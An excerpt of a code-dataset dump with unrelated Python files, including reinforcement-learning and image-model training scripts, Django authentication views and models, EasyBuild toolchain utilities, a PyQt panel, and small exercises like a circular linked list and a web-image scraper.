self.policy.sample_deltas(n_deltas=n_deltas)\n positive_rewards = [0] * n_deltas\n negative_rewards = [0] * n_deltas\n\n # play an episode each with positive deltas and negative deltas, collect rewards\n for k in range(n_deltas):\n positive_rewards[k] = self.explore(noise, direction=\"+\", delta=deltas[k])\n negative_rewards[k] = self.explore(noise, direction=\"-\", delta=deltas[k])\n \n # Compute the standard deviation of all rewards\n sigma_rewards = np.array(positive_rewards + negative_rewards).std()\n\n # Sort the rollouts by the max(r_pos, r_neg) and select the deltas with best rewards\n scores = {k:max(r_pos, r_neg) for k,(r_pos,r_neg) in enumerate(zip(positive_rewards, negative_rewards))}\n order = sorted(scores.keys(), key = lambda x:scores[x], reverse = True)[:n_best_deltas]\n rollouts = [(positive_rewards[k], negative_rewards[k], deltas[k]) for k in order]\n\n # Update the policy\n self.policy.update(rollouts, lr, sigma_rewards)\n\n # Only record video during evaluation, every n steps\n if step % self.video_freq == 0:\n self.record_video = True\n # Play an episode with the new weights and print the score\n reward_evaluation = self.explore(noise)\n print('Step: ', step, 'Reward: ', reward_evaluation)\n self.record_video = False\n\nif __name__ == '__main__':\n # openAI gym environment\n ENV_NAME = 'BipedalWalker-v2'\n \n # video directories\n video_dir = '../additional/videos'\n monitor_dir = os.path.join(video_dir, ENV_NAME)\n\n # create video directories\n if not os.path.exists(video_dir):\n os.makedirs(video_dir)\n if not os.path.exists(monitor_dir):\n os.makedirs(monitor_dir)\n\n # hyperparameters for training\n hyperparams = {\n 'n_steps': 1000, \n 'episode_length': 2000, \n 'lr': 0.01, \n 'n_deltas': 16, \n 'n_best_deltas': 16, \n 'noise': 0.03, \n 'video_freq': 50\n }\n\n # init model\n model = Model()\n\n # set environment and record params\n model.make_env(ENV_NAME, \n video_freq=hyperparams['video_freq'], \n monitor_dir=monitor_dir)\n \n # define input and output layer sizes\n input_size = model.env.observation_space.shape[0]\n output_size=model.env.action_space.shape[0]\n\n # initialize policy to use for training\n model.policy = Policy(input_size=input_size, output_size=output_size)\n\n # specify normalizing method to use\n model.set_normalizer(Normalizer(n_inputs=input_size))\n\n # train model\n model.train(n_steps=hyperparams['n_steps'], \n n_deltas=hyperparams['n_deltas'], \n n_best_deltas=hyperparams['n_best_deltas'], \n noise=hyperparams['noise'], \n episode_length=hyperparams['episode_length'], \n lr=hyperparams['lr'])\n\n ","sub_path":"src/bipedal.py","file_name":"bipedal.py","file_ext":"py","file_size_in_byte":9014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"107283005","text":"import os\nimport sys\nimport argparse\nfrom egcg_core.app_logging import logging_default as log_cfg\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom config import load_config\nfrom upload_to_gel.deliver_data_to_gel import GelDataDelivery, check_all_deliveries, report_all\n\n\ndef main():\n p = argparse.ArgumentParser()\n p.add_argument('--dry_run', action='store_true')\n p.add_argument('--debug', action='store_true')\n p.add_argument('--work_dir', type=str)\n group = p.add_mutually_exclusive_group()\n group.add_argument('--sample_id', type=str)\n group.add_argument('--user_sample_id', type=str)\n p.add_argument('--force_new_delivery', action='store_true')\n p.add_argument('--no_cleanup', action='store_true')\n p.add_argument('--check_all_deliveries', action='store_true')\n p.add_argument('--report', action='store_true')\n\n args = p.parse_args()\n load_config()\n log_cfg.add_stdout_handler()\n\n if args.debug:\n log_cfg.set_log_level(10)\n\n if args.check_all_deliveries:\n check_all_deliveries()\n elif args.report:\n report_all()\n else:\n gel_delivery = GelDataDelivery(args.sample_id, user_sample_id=args.user_sample_id, work_dir=args.work_dir,\n dry_run=args.dry_run, no_cleanup=args.no_cleanup,\n force_new_delivery=args.force_new_delivery)\n gel_delivery.deliver_data()\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"bin/deliver_data_to_gel.py","file_name":"deliver_data_to_gel.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"422222193","text":"import requests,bs4,os\n\nurl = 'http://docs.python-requests.org/zh_CN/latest/index.html#'\nos.makedirs('xkcd',exist_ok=True)\nwhile not url.endswith('#'):\n print('Downloading page %s...'%url)\n res =requests.get(url)\n res.raise_for_status()\n soup =bs4.BeautifulSoup(res.text)\n comicElem =soup.select('img [class = \"logo\"]')\n if comicElem ==[]:\n print('Could you find comic image...')\n else:\n comicURL = 'http:'+comicElem[0].get('src')\n print('Downloading image %s...'%(comicURL))\n res =requests.get(comicURL)\n res.raise_for_status()\n imageFile =open(os.path.join('xkcd',os.path.basename(comicURL)),'wb')\n for chunk in res.iter_content(100000):\n imageFile.write(chunk)\n imageFile.close()\n preLink =soup.select('a[rel=\"prev\"]')[0]\n url ='http://www.xkcd.com'+preLink.get('href')\n\nprint('Done.')\n\n","sub_path":"getcomdic.py","file_name":"getcomdic.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"638711470","text":"import cv2\nimport sys\n\nif len(sys.argv) != 2:\n sys.exit(\"usage: python2 SIFT.py \");\n\nimg = cv2.imread(str(sys.argv[1]))\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nsift = cv2.xfeatures2d.SIFT_create()\nkp = sift.detect(gray, None)\n\nimg2 = cv2.drawKeypoints(gray, kp, None, flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\ncv2.imshow('sift_keypoints.png', img2)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"SIFT.py","file_name":"SIFT.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"12995166","text":"import chainer\nimport chainer.functions as F\nimport argparse\n\nfrom pathlib import Path\nfrom chainer import serializers\nfrom model import Model, VGG\nfrom dataset import DatasetLoader\nfrom utils import set_optimizer\nfrom visualize import Visualizer\n\n\nclass RAMLossFunction:\n def __init__(self):\n pass\n\n @staticmethod\n def content_loss(y, t):\n return F.mean_absolute_error(y, t)\n\n @staticmethod\n def perceptual_loss(y, t):\n sum_loss = 0\n\n for f1, f2 in zip(y, t):\n _, c, h, w = f1.shape\n sum_loss += F.mean_squared_error(f1, f2) / (c * h * w)\n\n return sum_loss\n\n def __str__(self):\n return f\"func1: {self.content_loss.__name__}\\nfunc2: {self.perceptual_loss.__name__}\"\n\n\ndef train(epochs,\n iterations,\n batchsize,\n validsize,\n outdir,\n modeldir,\n extension,\n crop_size,\n learning_rate,\n beta1,\n beta2,\n data_path\n ):\n\n # Dataset Definition\n dataloader = DatasetLoader(data_path)\n print(dataloader)\n t_valid, x_valid = dataloader(validsize, mode=\"valid\")\n\n # Model & Optimizer Definition\n model = Model()\n model.to_gpu()\n optimizer = set_optimizer(model, learning_rate, beta1, beta2)\n\n vgg = VGG()\n vgg.to_gpu()\n vgg_opt = set_optimizer(vgg, learning_rate, beta1, beta2)\n vgg.base.disable_update()\n\n # Loss Function Definition\n lossfunc = RAMLossFunction()\n print(lossfunc)\n\n # Evaluation Definition\n visualizer = Visualizer()\n\n for epoch in range(epochs):\n sum_loss = 0\n for batch in range(0, iterations, batchsize):\n t_train, x_train = dataloader(batchsize, mode=\"train\")\n\n y_train = model(x_train)\n y_feat = vgg(y_train)\n t_feat = vgg(t_train)\n loss = lossfunc.content_loss(y_train, t_train)\n loss += lossfunc.perceptual_loss(y_feat, t_feat)\n\n model.cleargrads()\n vgg.cleargrads()\n loss.backward()\n optimizer.update()\n vgg_opt.update()\n loss.unchain_backward()\n\n sum_loss += loss.data\n\n if batch == 0:\n serializers.save_npz(f\"{modeldir}/model_{epoch}.model\", model)\n\n with chainer.using_config('train', False):\n y_valid = model(x_valid)\n x = x_valid.data.get()\n y = y_valid.data.get()\n t = t_valid.data.get()\n\n visualizer(x, y, t, epoch, outdir)\n\n print(f\"epoch: {epoch}\")\n print(f\"loss: {sum_loss / iterations}\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"RAM\")\n parser.add_argument('--e', type=int, default=1000, help=\"the number of epochs\")\n parser.add_argument('--i', type=int, default=10000, help=\"the number of iterations\")\n parser.add_argument('--b', type=int, default=16, help=\"batch size\")\n parser.add_argument('--v', type=int, default=12, help=\"valid size\")\n parser.add_argument('--outdir', type=Path, default=\"outdir\", help=\"output directory\")\n parser.add_argument('--modeldir', type=Path, default=\"modeldir\", help=\"model output directory\")\n parser.add_argument('--ext', type=str, default=\".jpg\", help=\"output directory\")\n parser.add_argument('--size', type=int, default=256, help=\"crop size of training images\")\n parser.add_argument('--lr', type=float, default=0.0001, help=\"learning rate of Adam\")\n parser.add_argument('--b1', type=float, default=0.5, help=\"beta1 of Adam\")\n parser.add_argument('--b2', type=float, default=0.999, help=\"beta2 of Adam\")\n parser.add_argument('--path', type=Path, help=\"path which contais training images\")\n args = parser.parse_args()\n\n outdir = args.outdir\n outdir.mkdir(exist_ok=True)\n\n modeldir = args.modeldir\n modeldir.mkdir(exist_ok=True)\n\n train(args.e, args.i, args.b, args.v, args.outdir, args.modeldir, args.ext, args.size,\n args.lr, args.b1, args.b2, args.path)","sub_path":"RAM/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"60930734","text":"def length_string(number):\n result = 0\n if number == 0 or number == 1:\n return 0\n else:\n for i in range(1, number):\n index = len(str(i))\n result += index\n return result\n\nprint(length_string(2020))\n\n\n\n\ndef ndigit(n):\n result = 0\n for i in range(1, n):\n count = 0\n while i!=0:\n i//=10\n count+=1\n result+=count\n return result\nprint(ndigit(2020))\n\n\n","sub_path":"howmanydigit.py","file_name":"howmanydigit.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"461955412","text":"class Node:\n\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass CircularLinkedList:\n\n def __init__(self):\n self.head = None\n\n def prepend(self, data):\n\n new_node = Node(data)\n new_node.next = self.head\n\n p = self.head\n\n if p.next == self.head:\n p.next = new_node\n\n else:\n while p.next != self.head:\n p = p.next\n p.next = new_node\n self.head = new_node\n\n def append(self, data):\n new_node = Node(data)\n\n if self.head is None:\n self.head = new_node\n new_node.next = self.head\n else:\n p = self.head\n while p.next != self.head:\n p = p.next\n p.next = new_node\n new_node.next = self.head\n\n def print_list(self):\n\n if self.head is None:\n print(\"List is empty\")\n\n elif self.head.next == self.head: # ! If list has only one value\n print(self.head.data)\n\n else: # ! If list has more than one values\n p = self.head\n while p.next != self.head:\n print(p.data)\n p = p.next\n print(p.data)\n\n def remove(self, key):\n # p = self.head\n # prev = None\n\n # if self.head is None:\n # return\n\n # # ! delete only node from the circular linked list if it matches the key.\n # elif p.next == self.head:\n # if p.data == key:\n # self.head = None\n # else:\n # print(f\"{key} is not found\")\n \n # #! delete first node from the non-empty list.\n # # if self.head.data == key:\n # # self.head = self.head.next\n \n # # while p.next != self.head:\n # # p = p.next\n # # p.next = p.next.next\n\n # while p.next != self.head: # ! delete any node from the non empty circular linked list\n # prev = p\n # p = p.next\n # if p.data == key:\n # break\n\n # if p.data == key: # ! If loop terminates because of key found in the circular linked list.\n # prev.next = p.next\n # else:\n # print(f\"{key} is not found\")\n\n # #! delete last node from the non-empty circular linked list\n # while p.next != self.head:\n # p = p.next\n # prev = p\n # if p.data == key:\n # prev.next = p.next\n # else:\n # print(\"Key is not found in the list.\")\n \n\n \"\"\"\n We have to take care for two cases \n 1. when the key is head node\n 2. when the key is not head node\n \"\"\"\n if self.head.data == key:\n p = self.head\n while p.next != self.head:\n p = p.next\n p.next = self.head.next\n self.head = self.head.next\n\n else:\n p = self.head\n prev = None\n while p.next != self.head:\n prev = p\n p = p.next\n if p.data == key:\n prev.next = p.next\n p = p.next \n \n def __len__(self):\n \"\"\"We are overriding the inbuilt len function so that it gives us the length of our circular linked list\"\"\"\n p = self.head\n count = 0\n while p:\n count += 1\n p = p.next\n if p == self.head:\n break\n return count\n \n def split_list(self):\n \"\"\"We need the len function. Because we will split our list from the mid so we need the mid point of the list.\"\"\"\n\n if len(self) == 0:\n return None\n \n if len(self) == 1:\n return self.head\n \n p = self.head\n prev = None\n\n count = 0\n mid_point = len(self)//2\n\n while p is not None and count < mid_point:\n count += 1\n prev = p\n p = p.next\n prev.next = self.head\n\n split_cllist = CircularLinkedList()\n while p.next != self.head:\n split_cllist.append(p.data)\n p = p.next\n split_cllist.append(p.data)\n\n self.print_list()\n print(\"\\n\")\n split_cllist.print_list()\n \n def concatenate_list(self, list2):\n p = self.head\n q = list2.head\n\n if p is None:\n p = q\n return\n \n if q is None:\n return\n \n while p.next != self.head:\n p = p.next\n p.next = q\n\n while q.next != list2.head:\n q = q.next\n q.next = self.head\n \n return self.print_list()\n\n\ncllist = CircularLinkedList()\ncllist2 = CircularLinkedList()\ncllist.append(6)\ncllist.append(7)\ncllist.append(8)\ncllist.append(9)\ncllist.append(10)\ncllist.prepend(5)\ncllist.prepend(4)\ncllist.prepend(3)\ncllist.prepend(2)\ncllist.prepend(1)\ncllist2.append(11)\ncllist2.append(12)\ncllist2.append(13)\ncllist2.append(14)\ncllist2.append(15)\n# cllist.remove(1)\n# cllist.remove(10)\n# cllist.split_list()\n# cllist.print_list()\ncllist.concatenate_list(cllist2)\n\n","sub_path":"LinkedList/Practice/CircularLinkedList.py","file_name":"CircularLinkedList.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"386640694","text":"from PyQt5.QtWidgets import QWidget, QApplication, QPushButton, QGridLayout, QFrame\nfrom PyQt5.QtWidgets import QHBoxLayout\n\n# 超级管理员功能界面\nfrom SuperAdminisOperation import Function\n\n\nclass Function_win(QFrame):\n def __init__(self):\n super(Function_win, self).__init__()\n self.setFrameShape(QFrame.StyledPanel)\n self.setFrameShadow(QFrame.Raised)\n self.datawindow = Function.Function(self)\n self.mainbutton1 = QPushButton(\"管理信息\") # 用户功能界面的控件\n self.mainbutton2 = QPushButton(\"爬虫\")\n self.mainbutton3 = QPushButton(\"添加资料\")\n self.devise_Ui()\n\n def devise_Ui(self):\n self.horizontalLayout = QHBoxLayout(self)\n self.layout = QGridLayout()\n self.win = QWidget()\n self.win.setLayout(self.layout) # 设置顶级布局管理器\n self.horizontalLayout.addWidget(self.win)\n self.win.setMouseTracking(True) # 设置widget鼠标跟踪\n\n self.desktop = QApplication.desktop() # 获取屏幕分辨率\n self.screenRect = self.desktop.screenGeometry()\n b = self.screenRect.height() * 1.0 / 4\n a = self.screenRect.width() * 1.0 / 5\n\n self.mainbutton1.setStyleSheet(\"QPushButton{ font-family:'宋体';font-size:32px;color:rgb(0,0,0);}\\\n QPushButton{background-color:rgb(170,200, 50)}\\\n QPushButton:hover{background-color:rgb(50, 170, 200)}\")\n self.mainbutton2.setStyleSheet(\"QPushButton{ font-family:'宋体';font-size:32px;color:rgb(0,0,0);}\\\n QPushButton{background-color:rgb(170,200, 50)}\\\n QPushButton:hover{background-color:rgb(50, 170, 200)}\")\n self.mainbutton3.setStyleSheet(\"QPushButton{ font-family:'宋体';font-size:32px;color:rgb(0,0,0);}\\\n QPushButton{background-color:rgb(170,200, 50)}\\\n QPushButton:hover{background-color:rgb(50, 170, 200)}\")\n self.layout.addWidget(self.mainbutton1, 0, 0) # 往网格的不同坐标添加不同的组件\n self.layout.addWidget(self.mainbutton2, 0, 1)\n self.layout.addWidget(self.mainbutton3, 0, 2)\n self.mainbutton1.setMaximumSize(a, b)\n self.mainbutton2.setMaximumSize(a, b)\n self.mainbutton3.setMaximumSize(a, b)","sub_path":"low7/SuperAdminisInterface/Function_win.py","file_name":"Function_win.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601528813","text":"import re\nfrom urllib.parse import parse_qs, urlparse\n\nfrom django.conf import settings\nfrom django.contrib.auth import logout as auth_logout\nfrom django.shortcuts import redirect\nfrom django.urls import reverse\nfrom django.utils import translation\nfrom django.utils.http import quote\nfrom django.views.generic.base import TemplateView\nfrom oauth2_provider.models import get_application_model\nfrom oidc_provider.models import Client\nfrom oidc_provider.views import AuthorizeView\n\nfrom oidc_apis.models import ApiScope\n\nfrom .models import LoginMethod, OidcClientOptions\n\n\nclass LoginView(TemplateView):\n template_name = \"login.html\"\n\n def get(self, request, *args, **kwargs): # noqa (too complex)\n next_url = request.GET.get('next')\n app = None\n oidc_client = None\n\n if next_url:\n # Determine application from the 'next' query argument.\n # FIXME: There should be a better way to get the app id.\n params = parse_qs(urlparse(next_url).query)\n client_id = params.get('client_id')\n\n if client_id and len(client_id):\n client_id = client_id[0].strip()\n\n if client_id:\n try:\n app = get_application_model().objects.get(client_id=client_id)\n except get_application_model().DoesNotExist:\n pass\n\n try:\n oidc_client = Client.objects.get(client_id=client_id)\n except Client.DoesNotExist:\n pass\n\n next_url = quote(next_url)\n\n allowed_methods = None\n if app:\n allowed_methods = app.login_methods.all()\n elif oidc_client:\n try:\n client_options = OidcClientOptions.objects.get(oidc_client=oidc_client)\n allowed_methods = client_options.login_methods.all()\n except OidcClientOptions.DoesNotExist:\n pass\n\n if allowed_methods is None:\n allowed_methods = LoginMethod.objects.all()\n\n methods = []\n for m in allowed_methods:\n assert isinstance(m, LoginMethod)\n if m.provider_id == 'saml':\n continue # SAML support removed\n\n m.login_url = reverse('social:begin', kwargs={'backend': m.provider_id})\n if next_url:\n m.login_url += '?next=' + next_url\n\n methods.append(m)\n\n if len(methods) == 1:\n return redirect(methods[0].login_url)\n\n self.login_methods = methods\n return super(LoginView, self).get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(LoginView, self).get_context_data(**kwargs)\n context['login_methods'] = self.login_methods\n return context\n\n\nclass LogoutView(TemplateView):\n template_name = 'logout_done.html'\n\n def get(self, *args, **kwargs):\n if self.request.user.is_authenticated:\n auth_logout(self.request)\n url = self.request.GET.get('next')\n if url and re.match(r'http[s]?://', url):\n return redirect(url)\n return super(LogoutView, self).get(*args, **kwargs)\n\n\nclass EmailNeededView(TemplateView):\n template_name = 'email_needed.html'\n\n def get_context_data(self, **kwargs):\n context = super(EmailNeededView, self).get_context_data(**kwargs)\n reauth_uri = self.request.GET.get('reauth_uri', '')\n if '//' in reauth_uri: # Prevent open redirect\n reauth_uri = ''\n context['reauth_uri'] = reauth_uri\n return context\n\n\nclass AuthenticationErrorView(TemplateView):\n template_name = 'account/signup_closed.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass TunnistamoOidcAuthorizeView(AuthorizeView):\n def get(self, request, *args, **kwargs):\n request.GET = _extend_scope_in_query_params(request.GET)\n request_locales = [l.strip() for l in request.GET.get('ui_locales', '').split(' ') if l]\n available_locales = [l[0] for l in settings.LANGUAGES]\n\n for locale in request_locales:\n if locale in available_locales:\n with translation.override(locale):\n return super().get(request, *args, **kwargs)\n\n return super().get(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n request.POST = _extend_scope_in_query_params(request.POST)\n return super().post(request, *args, **kwargs)\n\n\ndef _extend_scope_in_query_params(query_params):\n scope = query_params.get('scope')\n if scope:\n query_params = query_params.copy()\n query_params['scope'] = _add_api_scopes(scope)\n return query_params\n\n\ndef _add_api_scopes(scope_string):\n scopes = scope_string.split()\n extended_scopes = ApiScope.extend_scope(scopes)\n return ' '.join(extended_scopes)\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"221023963","text":"# #\n# Copyright 2012-2014 Ghent University\n#\n# This file is part of EasyBuild,\n# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),\n# with support of Ghent University (http://ugent.be/hpc),\n# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),\n# the Hercules foundation (http://www.herculesstichting.be/in_English)\n# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).\n#\n# http://github.com/hpcugent/easybuild\n#\n# EasyBuild is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation v2.\n#\n# EasyBuild is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with EasyBuild. If not, see .\n# #\n\"\"\"\nToolchain utility module\n\nEasy access to actual Toolchain classes\n search_toolchain\n\nBased on VSC-tools vsc.mympirun.mpi.mpi and vsc.mympirun.rm.sched\n\n@author: Stijn De Weirdt (Ghent University)\n@author: Kenneth Hoste (Ghent University)\n\"\"\"\nimport glob\nimport os\nimport re\nimport sys\nfrom vsc.utils import fancylogger\nfrom vsc.utils.missing import get_subclasses, nub\n\nimport easybuild.tools.toolchain\nfrom easybuild.tools.toolchain.toolchain import Toolchain\nfrom easybuild.tools.utilities import import_available_modules\n\n\nTC_CONST_PREFIX = 'TC_CONSTANT_'\n\n\ndef search_toolchain(name):\n \"\"\"\n Find a toolchain with matching name\n returns toolchain (or None), found_toolchains\n \"\"\"\n\n log = fancylogger.getLogger(\"search_toolchain\")\n\n package = easybuild.tools.toolchain\n check_attr_name = '%s_PROCESSED' % TC_CONST_PREFIX\n\n if not hasattr(package, check_attr_name) or not getattr(package, check_attr_name):\n # import all available toolchains, so we know about them\n tc_modules = import_available_modules('easybuild.toolchains')\n\n # make sure all defined toolchain constants are available in toolchain module\n tc_const_re = re.compile('^%s(.*)$' % TC_CONST_PREFIX)\n for tc_mod in tc_modules:\n # determine classes imported in this module\n mod_classes = []\n for elem in [getattr(tc_mod, x) for x in dir(tc_mod)]:\n if hasattr(elem, '__module__'):\n # exclude the toolchain class defined in that module\n if not tc_mod.__file__ == sys.modules[elem.__module__].__file__:\n log.debug(\"Adding %s to list of imported classes used for looking for constants\" % elem.__name__)\n mod_classes.append(elem)\n\n # look for constants in modules of imported classes, and make them available\n for mod_class_mod in [sys.modules[mod_class.__module__] for mod_class in mod_classes]:\n for elem in dir(mod_class_mod):\n res = tc_const_re.match(elem)\n if res:\n tc_const_name = res.group(1)\n tc_const_value = getattr(mod_class_mod, elem)\n log.debug(\"Found constant %s ('%s') in module %s, adding it to %s\" % (tc_const_name,\n tc_const_value,\n mod_class_mod.__name__,\n package.__name__))\n if hasattr(package, tc_const_name):\n cur_value = getattr(package, tc_const_name)\n if not tc_const_value == cur_value:\n log.error(\"Constant %s.%s defined as '%s', can't set it to '%s'.\" % (package.__name__,\n tc_const_name,\n cur_value,\n tc_const_value\n ))\n else:\n setattr(package, tc_const_name, tc_const_value)\n\n # indicate that processing of toolchain constants is done, so it's not done again\n setattr(package, check_attr_name, True)\n else:\n log.debug(\"Skipping importing of toolchain modules, processing of toolchain constants is already done.\")\n\n # obtain all subclasses of toolchain\n found_tcs = nub(get_subclasses(Toolchain))\n\n # filter found toolchain subclasses based on whether they can be used a toolchains\n found_tcs = [tc for tc in found_tcs if tc._is_toolchain_for(None)]\n\n for tc in found_tcs:\n if tc._is_toolchain_for(name):\n return tc, found_tcs\n\n return None, found_tcs\n","sub_path":"1.13.0/easybuild/tools/toolchain/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"416575470","text":"import os\nimport logging\nfrom datetime import timedelta\n\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.conf import settings\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import User\nfrom django_comments.models import Comment\nfrom django.db.models.signals import post_delete\nfrom django.utils import timezone\n\nfrom polymorphic.models import PolymorphicModel\n\nfrom comms import models as comms_models\n\nfrom mentor.blocks import MarkDownBlock\n\nfrom mentor.utils import (\n pick,\n conjoin,\n assign,\n send_notification_to_fcm,\n display_datetime,\n display_date,\n display_time)\n\nfrom wagtail.wagtailcore.models import Page\nfrom wagtail.wagtailcore.fields import StreamField\nfrom wagtail.wagtailsearch import index\nfrom wagtail.wagtailimages.edit_handlers import ImageChooserPanel\nfrom wagtail.wagtailadmin.edit_handlers import (\n FieldPanel, StreamFieldPanel)\nfrom wagtail.wagtailcore import blocks\nfrom wagtail.wagtailimages.blocks import ImageChooserBlock\n\nlog = logging.getLogger(__name__)\n\n\nclass Main(Page):\n parent_page_types = []\n subpage_types = ['CategoryIndexPage']\n\n\nclass Contact(models.Model):\n user = models.OneToOneField(User, related_name=\"contact_details\",\n primary_key=True)\n contact_number = models.CharField(blank=False,\n null=True,\n max_length=32,\n default=\"\", )\n external_id = models.CharField(blank=True, max_length=128)\n\n def __str__(self):\n return self.user.get_full_name() or self.user.username\n\n @property\n def mentor(self):\n # See https://github.com/praekelt/mentorship/pull/199 for why we need\n # this @property\n return self.as_mentor\n\n @property\n def mentee(self):\n # See https://github.com/praekelt/mentorship/pull/199 for why we need\n # this @property\n return self.as_mentee\n\n\nclass Mentee(Contact):\n as_contact = models.OneToOneField(\n Contact,\n parent_link=True,\n related_name=\"as_mentee\")\n\n\ndef profile_pic_path(instance, filename):\n \"\"\"Return the full path for the given profile picture.\"\"\"\n # This reads the PROFILE_UPLOADS setting dynamically to make it easier\n # override in tests and to avoid reading it as soon as the module is\n # imported.\n return os.path.join(settings.PROFILE_UPLOADS, filename)\n\n\nclass Mentor(Contact):\n as_contact = models.OneToOneField(\n Contact,\n parent_link=True,\n related_name=\"as_mentor\")\n mentee = models.OneToOneField(\n Mentee,\n related_name=\"mentor\",\n on_delete=models.SET_NULL,\n null=True,\n blank=True)\n profile_pic = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n job_sector = models.CharField(max_length=100, null=True, blank=True)\n job_title = models.CharField(max_length=100, null=True, blank=True)\n motivation = models.CharField(max_length=500, null=True, blank=True)\n inspiration = models.CharField(max_length=500, null=True, blank=True)\n tags = models.CharField(max_length=500, null=True, blank=True)\n skills = models.CharField(max_length=500, null=True, blank=True)\n activity = models.ManyToManyField(\n 'Activity', related_name='mentors', blank=True, null=True)\n latest_post_date = models.DateTimeField(blank=True, null=True)\n\n\n@receiver(post_save, sender=Mentor,\n dispatch_uid=\"create_notification_settings\")\ndef create_notification_settings(sender, instance, created, **kwargs):\n if created:\n NotificationSettings.objects.create(mentor=instance)\n\n\nclass Call(models.Model):\n UPDATE_FIELDS = (\n 'status',\n 'partner_id',\n 'recording_url',\n 'partner_start_time',\n 'partner_end_time')\n\n STATUS_TYPES = (\n ('SUCCESSFUL', 'Successful'),\n ('SCHEDULED', 'Scheduled'),\n ('INPROGRESS', 'In Progress'),\n ('INACTIVE', 'Unsuccessful'))\n\n STATUS_DISPLAY_LOOKUP = dict(STATUS_TYPES)\n\n TIMEOUT_DELTA = timedelta(days=1)\n\n start_time = models.DateTimeField(\n auto_now_add=True,\n verbose_name=\"Mentor activated call\")\n end_time = models.DateTimeField(\n blank=True,\n null=True,\n verbose_name=\"System notified of call end\")\n partner_start_time = models.DateTimeField(\n blank=True,\n null=True,\n verbose_name=\"Start time\")\n partner_end_time = models.DateTimeField(\n blank=True,\n null=True,\n verbose_name=\"End time\")\n caller = models.ForeignKey(\n 'Contact',\n related_name=\"caller\",\n verbose_name=\"Mentor\")\n receiver = models.ForeignKey(\n 'Contact',\n related_name=\"receiver\",\n verbose_name=\"Mentee\")\n feedback_task = models.ForeignKey('Task', related_name=\"call\", null=True,\n default=\"\")\n recording_url = models.URLField(max_length=200, null=True, blank=True,\n help_text=\"URL for the call recording\")\n partner_id = models.CharField(\n max_length=100, null=True, blank=True,\n help_text=\"ID used by partner to identify call\")\n activity = models.ForeignKey(\n 'Activity', related_name='activity', blank=True, null=True)\n scheduled_call = models.ForeignKey(\n 'ScheduledCall', related_name='scheduled', blank=True, null=True)\n call_id = models.CharField(\n max_length=255, blank=True, null=True, default='')\n _status = models.CharField(\n blank=False,\n null=False,\n default=\"\",\n max_length=255,\n choices=STATUS_TYPES,\n db_column='status')\n\n @classmethod\n def from_partner_id(self, partner_id):\n if partner_id is None:\n return None\n\n calls = Call.objects.filter(partner_id=partner_id)\n num_calls = len(calls)\n\n if num_calls > 1:\n log.warning(\"Multiple calls matching partner id found\")\n return None\n elif num_calls == 0:\n return None\n else:\n return calls[0]\n\n @property\n def status(self):\n if self._status:\n return self._status\n elif self.end_time is not None:\n return 'SUCCESSFUL'\n elif self.has_timed_out():\n return 'INACTIVE'\n else:\n return 'INPROGRESS'\n\n @status.setter\n def status(self, new_status):\n self._status = new_status\n return new_status\n\n def get_duration(self):\n if all((self.partner_start_time, self.partner_end_time)):\n return self.partner_end_time - self.partner_start_time\n else:\n return None\n\n def get_lag(self):\n if self.partner_start_time is not None:\n return self.partner_start_time - self.start_time\n else:\n None\n\n def get_status_display(self):\n return self.STATUS_DISPLAY_LOOKUP[self.status]\n\n def _create_entering_cdrs(self, next_cdrs):\n curr_cdr_ids = set(\n cdr['partner_id']\n for cdr in self.call_data_records.values('partner_id'))\n\n entering = (\n CallDataRecord(**conjoin(cdr, {'call': self}))\n for cdr in next_cdrs\n if cdr['partner_id'] not in curr_cdr_ids)\n\n CallDataRecord.objects.bulk_create(entering)\n\n def _infer_ended(self, data):\n # compatibility with old onion dev api\n return 